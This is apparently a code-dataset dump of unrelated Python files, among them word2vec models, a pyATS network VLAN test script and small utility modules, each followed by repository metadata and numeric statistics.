        adjacency = data[:, :, :, 1]
        l_adjacency = [torch.where(adj > 0) for adj in adjacency]
        l_inferred = [scores[src, dst] for scores, (src, dst) in zip(raw_scores, l_adjacency)]
        l_target = [sol[src, dst] for sol, (src, dst) in zip(target, l_adjacency)]
    return l_inferred, l_target, l_adjacency
def node_converter(raw_scores, target, data=None, **kwargs):
    """Convert raw node scores and targets to per-graph node-feature form.

    Returns (l_inferred, l_target, l_adjacency) with one entry per graph;
    adjacency entries are (src, dst) index pairs.
    """
    if isinstance(target, dgl.DGLGraph):
        node_proba = torch.softmax(raw_scores, dim=-1)[:, 1]
        target.ndata['inferred'] = node_proba
        graphs = dgl.unbatch(target)
        l_inferred = [g.ndata['inferred'] for g in graphs]
        l_target = [g.ndata['solution'].squeeze() for g in graphs]
        l_adjacency = [g.edges() for g in graphs]
    else:
        assert data is not None, "No data, can't find adjacency"
        assert data.ndim == 4, "Data not recognized. Should be (batch size, n_vertices, n_vertices, N_Features)"
        adjacency = data[:, :, :, 1]
        l_adjacency = [torch.where(adj > 0) for adj in adjacency]
        l_inferred = [score.squeeze(-1) for score in raw_scores]
        l_target = [cur for cur in target]
    return l_inferred, l_target, l_adjacency
| 52.742424 | 125 | 0.665326 | 476 | 3,481 | 4.647059 | 0.178571 | 0.088156 | 0.045208 | 0.085895 | 0.842224 | 0.806058 | 0.790235 | 0.746383 | 0.746383 | 0.678571 | 0 | 0.007786 | 0.225223 | 3,481 | 66 | 126 | 52.742424 | 0.812384 | 0 | 0 | 0.616667 | 0 | 0 | 0.106261 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.05 | false | 0 | 0.05 | 0 | 0.15 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4863db9bb4da731555bdb414f985244355b017a1 | 151 | py | Python | shapecutter/providers/__init__.py | informatics-lab/shapecutter | f974ec3b5858203bb3312463ebb55d33096cb798 | [
"BSD-3-Clause"
] | null | null | null | shapecutter/providers/__init__.py | informatics-lab/shapecutter | f974ec3b5858203bb3312463ebb55d33096cb798 | [
"BSD-3-Clause"
] | null | null | null | shapecutter/providers/__init__.py | informatics-lab/shapecutter | f974ec3b5858203bb3312463ebb55d33096cb798 | [
"BSD-3-Clause"
] | null | null | null | """Provider classes for data and geometry sources."""
from .data import select_best_data_provider
from .geometry import select_best_geometry_provider
| 30.2 | 53 | 0.834437 | 21 | 151 | 5.714286 | 0.52381 | 0.2 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10596 | 151 | 4 | 54 | 37.75 | 0.888889 | 0.311258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4868aaa3e94aee9c9eaee087205e39e83bdfabc2 | 140 | py | Python | snakr/bigquery.py | bretlowery/snakr | eee58a18df2e194b72b5dc07cc5a27856f49593c | [
"BSD-3-Clause"
] | 1 | 2016-11-27T23:31:33.000Z | 2016-11-27T23:31:33.000Z | snakr/bigquery.py | bretlowery/snakr | eee58a18df2e194b72b5dc07cc5a27856f49593c | [
"BSD-3-Clause"
] | null | null | null | snakr/bigquery.py | bretlowery/snakr | eee58a18df2e194b72b5dc07cc5a27856f49593c | [
"BSD-3-Clause"
] | null | null | null | from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from oauth2client.client import GoogleCredentials
| 28 | 49 | 0.885714 | 15 | 140 | 8.266667 | 0.666667 | 0.306452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007874 | 0.092857 | 140 | 4 | 50 | 35 | 0.968504 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
48872fe4781cd9390193bf064238c14849d958e6 | 43 | py | Python | codingbat.com/List-1/sum2.py | ahmedelq/PythonicAlgorithms | ce10dbb6e1fd0ea5c922a932b0f920236aa411bf | [
"MIT"
] | null | null | null | codingbat.com/List-1/sum2.py | ahmedelq/PythonicAlgorithms | ce10dbb6e1fd0ea5c922a932b0f920236aa411bf | [
"MIT"
] | null | null | null | codingbat.com/List-1/sum2.py | ahmedelq/PythonicAlgorithms | ce10dbb6e1fd0ea5c922a932b0f920236aa411bf | [
"MIT"
def sum2(nums):
    """Return the sum of the first two elements of *nums* (fewer if shorter)."""
    first_two = nums[:2]
    return sum(first_two)
| 14.333333 | 26 | 0.581395 | 7 | 43 | 3.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 0.232558 | 43 | 2 | 27 | 21.5 | 0.69697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6f8a772fde9e0b478f79cd961bf619408c48f411 | 11,424 | py | Python | lib/word2vec_utils/word2vec_utils/word2vec_utils.py | simonefu/Word_Embeddings | 23333aaeeba8664e080943c7898f2149dcca3fec | [
"MIT"
] | null | null | null | lib/word2vec_utils/word2vec_utils/word2vec_utils.py | simonefu/Word_Embeddings | 23333aaeeba8664e080943c7898f2149dcca3fec | [
"MIT"
] | null | null | null | lib/word2vec_utils/word2vec_utils/word2vec_utils.py | simonefu/Word_Embeddings | 23333aaeeba8664e080943c7898f2149dcca3fec | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
import urllib.request
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
from nltk import word_tokenize
import sklearn
from sklearn.cluster import KMeans
from sklearn.metrics.pairwise import euclidean_distances
class CBOW_model(nn.Module):
    """Continuous-bag-of-words model: predicts a target word from the
    embeddings of its surrounding context words.

    Architecture: embedding lookup -> linear(context*dim -> 128) -> ReLU
    -> linear(128 -> vocab) -> log-softmax.
    """

    def __init__(self, vocab_size, embedding_dim, context_size):
        """
        vocab_size : int, number of words in the vocabulary
        embedding_dim : int, dimensionality of the embedding space
        context_size : int, number of context words fed per prediction
        """
        super(CBOW_model, self).__init__()
        self.embeddings = nn.Embedding(vocab_size, embedding_dim)
        self.linear1 = nn.Linear(context_size * embedding_dim, 128)
        self.linear2 = nn.Linear(128, vocab_size)

    def forward(self, inputs):
        """Return log-probabilities over the vocabulary, shape (1, vocab_size).

        inputs : LongTensor of context word indices (length context_size).
        """
        # Flatten the context embeddings into a single row vector.
        flat_context = self.embeddings(inputs).view((1, -1))
        hidden = F.relu(self.linear1(flat_context))
        logits = self.linear2(hidden)
        return F.log_softmax(logits, dim=1)

    def predict(self, input):
        """Print the three most likely target words for the given context.

        NOTE(review): relies on a module-level `word_to_ix` mapping defined
        by the training script, not in this module — verify before use.
        """
        context_idxs = torch.tensor([word_to_ix[w] for w in input], dtype=torch.long)
        log_probs = self.forward(context_idxs)
        best = torch.argmax(log_probs)
        sorted_vals, sorted_ids = log_probs.sort(descending=True)
        top_vals = sorted_vals[0][:3]
        top_ids = sorted_ids[0][:3]
        for score, word_id in zip(top_vals, top_ids):
            print([(key, val, score) for key, val in word_to_ix.items() if val == word_id])
class Skipgram_model(nn.Module):
    """Skip-gram model: predicts the surrounding context words from a single
    input word.

    Architecture: embedding lookup -> linear(dim -> 128) -> ReLU
    -> linear(128 -> context*vocab) -> log-softmax, reshaped to
    (context_size, vocab_size).
    """

    def __init__(self, vocab_size, embedding_dim, context_size):
        """
        vocab_size : int, number of words in the vocabulary
        embedding_dim : int, dimensionality of the embedding space
        context_size : int, number of context words predicted per input word
        """
        super(Skipgram_model, self).__init__()
        # Bug fix: remember the context size on the instance; forward()
        # previously read a module-level CONTEXT_SIZE global that is not
        # defined in this module (NameError at runtime).
        self.context_size = context_size
        self.embeddings = nn.Embedding(vocab_size, embedding_dim)
        self.linear1 = nn.Linear(embedding_dim, 128)
        self.linear2 = nn.Linear(128, context_size * vocab_size)

    def forward(self, inputs):
        """Return log-probabilities, shape (context_size, vocab_size).

        inputs : LongTensor containing the single input word index.
        """
        embeds = self.embeddings(inputs).view((1, -1))
        out1 = F.relu(self.linear1(embeds))  # first layer + activation
        out2 = self.linear2(out1)            # logits for all context slots
        log_probs = F.log_softmax(out2, dim=1).view(self.context_size, -1)
        return log_probs

    def predict(self, input):
        """Print the three most likely context words for *input*.

        NOTE(review): relies on a module-level `word_to_ix` mapping defined
        by the training script, not in this module — verify before use.
        """
        context_idxs = torch.tensor([word_to_ix[input]], dtype=torch.long)
        res = self.forward(context_idxs)
        res_arg = torch.argmax(res)
        res_val, res_ind = res.sort(descending=True)
        indices = [res_ind[i][0] for i in np.arange(0, 3)]
        for arg in indices:
            print([(key, val) for key, val in word_to_ix.items() if val == arg])
def get_key(word_id):
    """Print and return the vocabulary word mapped to *word_id*.

    Bug fix: the docstring promised a return value but the original only
    printed. Every matching word is still printed (as before); the last
    match is now also returned, or None when no word has this id.

    NOTE(review): scans the module-level `word_to_ix` mapping, which is
    defined by the training script, not in this module.
    """
    found = None
    for key, val in word_to_ix.items():
        if val == word_id:
            print(key)
            found = key
    return found
def cluster_embeddings(filename, nclusters):
    """Cluster saved embeddings and, for each cluster, print the id and word
    of the embedding closest to the cluster centre.

    filename : str, path of a .npy array of embedding vectors
    nclusters : int, number of k-means clusters
    """
    embeddings = np.load(filename)
    kmeans = KMeans(n_clusters=nclusters, random_state=0).fit(embeddings)
    centers = kmeans.cluster_centers_
    distances = euclidean_distances(embeddings, centers)
    for cluster_idx in np.arange(0, distances.shape[1]):
        closest_id = np.argmin(distances[:, cluster_idx])
        print(closest_id)
        get_key(closest_id)
def read_data(file_path):
    """Download a text file and return its tokens with stop words removed.

    file_path : str, URL of the text file to fetch
    Returns the list of remaining tokens.
    """
    tokenizer = RegexpTokenizer(r'\w+')
    response = urllib.request.urlopen(file_path)
    raw_text = response.read().decode('utf8')
    tokens = word_tokenize(raw_text)
    # NLTK's English stop words plus common punctuation tokens.
    stop_words = set(stopwords.words('english'))
    stop_words.update(['.', ',', ':', ';', '(', ')', '#', '--', '...', '"'])
    cleaned_words = [token for token in tokens if token not in stop_words]
    return cleaned_words
class CBOWModeler(nn.Module):
    """CBOW model with utilities for freezing layers, inspecting parameters
    and exporting the learned embeddings.

    Architecture: embedding lookup -> linear(context*dim -> 128) -> ReLU
    -> linear(128 -> vocab) -> log-softmax.
    """

    def __init__(self, vocab_size, embedding_dim, context_size):
        """
        vocab_size : int, number of words in the vocabulary
        embedding_dim : int, dimensionality of the embedding space
        context_size : int, number of context words fed per prediction
        """
        super(CBOWModeler, self).__init__()
        self.embeddings = nn.Embedding(vocab_size, embedding_dim)
        self.linear1 = nn.Linear(context_size * embedding_dim, 128)
        self.linear2 = nn.Linear(128, vocab_size)

    def forward(self, inputs):
        """Return log-probabilities over the vocabulary, shape (1, vocab_size).

        inputs : LongTensor of context word indices (length context_size).
        """
        embeds = self.embeddings(inputs).view((1, -1))  # flatten context embeddings
        out1 = F.relu(self.linear1(embeds))  # first layer + activation
        out2 = self.linear2(out1)            # vocabulary logits
        log_probs = F.log_softmax(out2, dim=1)
        return log_probs

    def predict(self, input):
        """Print the three most likely target words for the context *input*.

        NOTE(review): relies on a module-level `word_to_ix` mapping defined
        by the training script, not in this module — verify before use.
        """
        context_idxs = torch.tensor([word_to_ix[w] for w in input], dtype=torch.long)
        res = self.forward(context_idxs)
        res_arg = torch.argmax(res)
        res_val, res_ind = res.sort(descending=True)
        res_val = res_val[0][:3]
        res_ind = res_ind[0][:3]
        for arg in zip(res_val, res_ind):
            print([(key, val, arg[0]) for key, val in word_to_ix.items() if val == arg[1]])

    def freeze_layer(self, layer):
        """Disable gradient updates for the named child module *layer*.

        Bug fix: the original iterated a module-level `model` global (a
        NameError when no such global exists); it now iterates this
        instance's own children.
        """
        for name, child in self.named_children():
            print(name, child)
            if name == layer:
                for names, params in child.named_parameters():
                    print(names, params)
                    print(params.size())
                    params.requires_grad = False

    def print_layer_parameters(self):
        """Print every child module and all of its parameters.

        Bug fix: iterates `self` rather than an undefined `model` global.
        """
        for name, child in self.named_children():
            print(name, child)
            for names, params in child.named_parameters():
                print(names, params)
                print(params.size())

    def write_embedding_to_file(self, filename):
        """Save the embedding weight matrix to *filename* (.npy) and return it."""
        for i in self.embeddings.parameters():
            weights = i.data.numpy()
        np.save(filename, weights)
        return weights
| 32.180282 | 123 | 0.584996 | 1,380 | 11,424 | 4.723188 | 0.144203 | 0.020712 | 0.034366 | 0.02332 | 0.759742 | 0.75023 | 0.745627 | 0.745627 | 0.739951 | 0.739951 | 0 | 0.01046 | 0.322129 | 11,424 | 354 | 124 | 32.271186 | 0.831224 | 0 | 0 | 0.513043 | 0 | 0 | 0.005079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.104348 | null | null | 0.104348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6f90680823c6fe76b63921ed79900d53a7ee49a2 | 149 | py | Python | itmo/2014-15/final/store.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | null | null | null | itmo/2014-15/final/store.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | null | null | null | itmo/2014-15/final/store.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
import math

# The original expression ceil(log(x) / log(2)) is kept verbatim inside the
# helper so floating-point rounding (and therefore the printed output) is
# unchanged.
_LOG2 = math.log(2)


def _ceil_log2(value):
    """Ceil of log2(value), computed as ceil(log(value) / log(2))."""
    return math.ceil(math.log(value) / _LOG2)


for i in range(1, 100):
    print(i, _ceil_log2(i * 10000000 + 2563218) - _ceil_log2(i * 256 * 32 * 18))
| 37.25 | 112 | 0.677852 | 31 | 149 | 3.258065 | 0.548387 | 0.277228 | 0.237624 | 0.29703 | 0.316832 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208955 | 0.100671 | 149 | 3 | 113 | 49.666667 | 0.544776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
6f9730618ab89bf474db4ed001fc34c303c7a73b | 121 | py | Python | mlfinlab/filters/__init__.py | rooster1979/mlfin | cc7efe071713ae522fc21519dc344e39b718c6f6 | [
"MIT"
] | 5 | 2020-05-04T15:26:08.000Z | 2021-07-18T00:07:05.000Z | mlfinlab/filters/__init__.py | anirbanghoshsbi/mlfinlab | 3a6381d47fb50d86ce657f184490f012adf6fb37 | [
"BSD-3-Clause"
] | 1 | 2020-03-19T15:07:58.000Z | 2020-03-19T15:07:58.000Z | mlfinlab/filters/__init__.py | anirbanghoshsbi/mlfinlab | 3a6381d47fb50d86ce657f184490f012adf6fb37 | [
"BSD-3-Clause"
] | 2 | 2020-01-20T04:22:05.000Z | 2020-04-05T14:42:32.000Z | """
Logic regarding the various types of filters:
* CUSUM Filter
"""
from mlfinlab.filters.filters import cusum_filter
| 15.125 | 49 | 0.768595 | 16 | 121 | 5.75 | 0.75 | 0.23913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14876 | 121 | 7 | 50 | 17.285714 | 0.893204 | 0.504132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6f9dbb038e6121782463a4c34d34ed88a5d4d1fe | 14,135 | py | Python | RobotFramework/inventories/production/vlans_check.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 36 | 2019-07-17T17:00:32.000Z | 2022-03-26T09:34:40.000Z | RobotFramework/ex4/vlans_check.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 4 | 2021-03-31T19:16:53.000Z | 2021-12-13T20:01:57.000Z | RobotFramework/inventories/development/vlans_check.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 10 | 2019-07-31T07:58:03.000Z | 2021-10-13T04:45:45.000Z | # Example
# -------
#
# vlans_check.py
from pyats import aetest
import logging
import textfsm
from pyats.log.utils import banner
# TextFSM template for cisco_ios_show_vlan
# NOTE(review): this single file handle is shared by every test case below,
# and TextFSM reads it when constructing the parser — after the first parse
# the handle may be at EOF, so later parses could see an empty template.
# TODO confirm and consider re-opening the file per parse.
template = open('cisco_ios_show_vlan.template')
# Compare these vlans [lists] with output from device (# show vlan br)
# Each row is [vlan_id, name, status] as produced by the TextFSM template.
vlan10 = ['10', 'Sales', 'active']
vlan20 = ['20', 'Managers', 'active']
vlan30 = ['30', 'Developers', 'active']
vlan40 = ['40', 'Accounting', 'active']
# get your logger for your script
logger = logging.getLogger(__name__)
class CommonSetup(aetest.CommonSetup):
    """Common setup: resolve the six switches from the testbed and connect."""

    # CommonSetup-SubSec1
    @aetest.subsection
    def check_topology(
            self,
            testbed,
            HQ_DIS1_name = 'HQ-DIS1',
            HQ_DIS2_name = 'HQ-DIS2',
            HQ_AC1_name = 'HQ-AC1',
            HQ_AC2_name = 'HQ-AC2',
            HQ_AC3_name = 'HQ-AC3',
            HQ_AC4_name = 'HQ-AC4'):
        """Look each device up in the testbed and publish it as a testscript
        parameter under its alias."""
        aliases = {
            'HQ_DIS1': HQ_DIS1_name,
            'HQ_DIS2': HQ_DIS2_name,
            'HQ_AC1': HQ_AC1_name,
            'HQ_AC2': HQ_AC2_name,
            'HQ_AC3': HQ_AC3_name,
            'HQ_AC4': HQ_AC4_name,
        }
        resolved = {alias: testbed.devices[name] for alias, name in aliases.items()}
        # add them to testscript parameters
        self.parent.parameters.update(**resolved)

    # CommonSetup-SubSec
    @aetest.subsection
    def establish_connections(self, steps, HQ_DIS1, HQ_DIS2, HQ_AC1, HQ_AC2, HQ_AC3, HQ_AC4):
        """Connect to every device, one reporting step per device."""
        for device in (HQ_DIS1, HQ_DIS2, HQ_AC1, HQ_AC2, HQ_AC3, HQ_AC4):
            with steps.start('Connecting to %s' % device.name):
                device.connect()
# TestCases
class TESTCASE_1(aetest.Testcase):
    """Verify that the expected VLANs exist and are active on each switch.

    Distribution switches carry all four VLANs; each access switch carries
    only its own VLAN (so its row appears at parsed index 1).
    """

    def _check_vlans(self, device, expected_vlans):
        """Run 'show vlan brief' on *device* and compare the parsed rows.

        device         : connected pyATS device to execute the command on
        expected_vlans : list of ['id', 'name', 'status'] rows; row i is
                         checked against parsed_results[i + 1] (index 0 is
                         the default VLAN 1 row).
        Fails the testcase on any mismatch or execution error.
        """
        try:
            # store execution result for later usage
            result = device.execute('show vlan brief')
            results_template = textfsm.TextFSM(template)
            parsed_results = results_template.ParseText(result)
            for offset, expected in enumerate(expected_vlans, start=1):
                row = parsed_results[offset]
                row.pop()  # drop the trailing interface-list column
                vlan_id = expected[0]
                if row == expected:
                    print('VLAN-%s - [EXISTS and ACTIVE]' % vlan_id)
                else:
                    logger.info(banner('VLAN-%s - [DOES NOT EXIST]' % vlan_id))
                    # NOTE(review): as in the original, this result signal is
                    # raised inside the try and therefore reaches the broad
                    # except below — confirm this flow is intended.
                    self.failed()
        except Exception as e:
            # Bug fix: the original handlers formatted this message with
            # HQ_AC1, a name in scope in only one of the six test methods,
            # so a failure on any other device raised NameError instead.
            self.failed('Device {} \'show vlan brief\' failed: '
                        '{}'.format(device, str(e)),
                        goto=['exit'])
        else:
            print('ALL VLANS EXISTS')

    @aetest.test
    def HQ_DIS1_SHOW_VLAN_BRIEF_CHECK(self, HQ_DIS1):
        self._check_vlans(HQ_DIS1, [vlan10, vlan20, vlan30, vlan40])

    @aetest.test
    def HQ_DIS2_SHOW_VLAN_BRIEF_CHECK(self, HQ_DIS2):
        self._check_vlans(HQ_DIS2, [vlan10, vlan20, vlan30, vlan40])

    @aetest.test
    def HQ_AC1_SHOW_VLAN_BRIEF_CHECK(self, HQ_AC1):
        self._check_vlans(HQ_AC1, [vlan10])

    @aetest.test
    def HQ_AC2_SHOW_VLAN_BRIEF_CHECK(self, HQ_AC2):
        self._check_vlans(HQ_AC2, [vlan20])

    @aetest.test
    def HQ_AC3_SHOW_VLAN_BRIEF_CHECK(self, HQ_AC3):
        self._check_vlans(HQ_AC3, [vlan30])

    @aetest.test
    def HQ_AC4_SHOW_VLAN_BRIEF_CHECK(self, HQ_AC4):
        self._check_vlans(HQ_AC4, [vlan40])
# CommonCleanup
class CommonCleanup(aetest.CommonCleanup):
@aetest.subsection
def disconnect(self, steps, HQ_DIS1, HQ_DIS2, HQ_AC1, HQ_AC2, HQ_AC3, HQ_AC4):
with steps.start('Disconnecting from %s' % HQ_DIS1.name):
HQ_DIS1.disconnect()
with steps.start('Disconnecting from %s' % HQ_DIS2.name):
HQ_DIS2.disconnect()
with steps.start('Disconnecting from %s' % HQ_AC1.name):
HQ_AC1.disconnect()
with steps.start('Disconnecting from %s' % HQ_AC2.name):
HQ_AC2.disconnect()
with steps.start('Disconnecting from %s' % HQ_AC3.name):
HQ_AC3.disconnect()
with steps.start('Disconnecting from %s' % HQ_AC4.name):
HQ_AC4.disconnect()
if __name__ == '__main__':
import argparse
from pyats.topology import loader
parser = argparse.ArgumentParser()
parser.add_argument('--testbed', dest = 'testbed',
type = loader.load)
args, unknown = parser.parse_known_args()
aetest.main(**vars(args)) | 34.72973 | 93 | 0.525999 | 1,517 | 14,135 | 4.726434 | 0.091628 | 0.054393 | 0.063598 | 0.063598 | 0.847141 | 0.821897 | 0.780614 | 0.775732 | 0.719944 | 0.683124 | 0 | 0.047281 | 0.362575 | 14,135 | 407 | 94 | 34.72973 | 0.748502 | 0.231341 | 0 | 0.631579 | 0 | 0 | 0.128279 | 0.002605 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039474 | false | 0 | 0.026316 | 0 | 0.078947 | 0.078947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6fa21615bf689fb1c47e48a0fb4bde9df1fc91c1 | 123 | py | Python | cosrlib/document/html/__init__.py | commonsearch/cosr-back | 28ca0c1b938dde52bf4f59a835c98dd5ab22cad6 | [
"Apache-2.0"
] | 141 | 2016-02-17T14:27:57.000Z | 2021-12-27T02:56:48.000Z | cosrlib/document/html/__init__.py | commonsearch/cosr-back | 28ca0c1b938dde52bf4f59a835c98dd5ab22cad6 | [
"Apache-2.0"
] | 69 | 2016-02-20T02:06:59.000Z | 2017-01-29T22:23:46.000Z | cosrlib/document/html/__init__.py | commonsearch/cosr-back | 28ca0c1b938dde52bf4f59a835c98dd5ab22cad6 | [
"Apache-2.0"
] | 38 | 2016-02-25T04:40:07.000Z | 2020-06-11T07:22:44.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
from .htmldocument import HTMLDocument
| 30.75 | 82 | 0.869919 | 14 | 123 | 7.142857 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 123 | 3 | 83 | 41 | 0.900901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
6fb902de41240143ed7fba6dbd3ce91040aca3f9 | 26 | py | Python | terrascript/spotinst/__init__.py | GarnerCorp/python-terrascript | ec6c2d9114dcd3cb955dd46069f8ba487e320a8c | [
"BSD-2-Clause"
] | null | null | null | terrascript/spotinst/__init__.py | GarnerCorp/python-terrascript | ec6c2d9114dcd3cb955dd46069f8ba487e320a8c | [
"BSD-2-Clause"
] | null | null | null | terrascript/spotinst/__init__.py | GarnerCorp/python-terrascript | ec6c2d9114dcd3cb955dd46069f8ba487e320a8c | [
"BSD-2-Clause"
] | 1 | 2018-11-15T16:23:05.000Z | 2018-11-15T16:23:05.000Z | """2019-05-28 10:50:37"""
| 13 | 25 | 0.538462 | 6 | 26 | 2.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.583333 | 0.076923 | 26 | 1 | 26 | 26 | 0 | 0.730769 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6fde74220f54a551d0c63336186fcd91dd9e1e9c | 160 | py | Python | python/kwiver/sprokit/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 176 | 2015-07-31T23:33:37.000Z | 2022-03-21T23:42:44.000Z | python/kwiver/sprokit/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 1,276 | 2015-05-03T01:21:27.000Z | 2022-03-31T15:32:20.000Z | python/kwiver/sprokit/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 85 | 2015-01-25T05:13:38.000Z | 2022-01-14T14:59:37.000Z | # -*- coding: utf-8 -*-
"""
The base SPROKIT package initialization
"""
# flake8: noqa
from __future__ import print_function, unicode_literals, absolute_import
| 22.857143 | 72 | 0.75 | 19 | 160 | 5.947368 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014388 | 0.13125 | 160 | 6 | 73 | 26.666667 | 0.798561 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
6ffb015dc6dcff1447dfa9f9030835ec04278c00 | 330 | py | Python | src/activesoup/response.py | n2ygk/activesoup | a66c4ba174e5d40bb343de5bffc49356615a1566 | [
"MIT"
] | null | null | null | src/activesoup/response.py | n2ygk/activesoup | a66c4ba174e5d40bb343de5bffc49356615a1566 | [
"MIT"
] | null | null | null | src/activesoup/response.py | n2ygk/activesoup | a66c4ba174e5d40bb343de5bffc49356615a1566 | [
"MIT"
] | null | null | null | class Response:
def __init__(self, raw_response):
self._raw_response = raw_response
@property
def url(self):
return self._raw_response.url
@property
def status_code(self):
return self._raw_response.status_code
@property
def response(self):
return self._raw_response
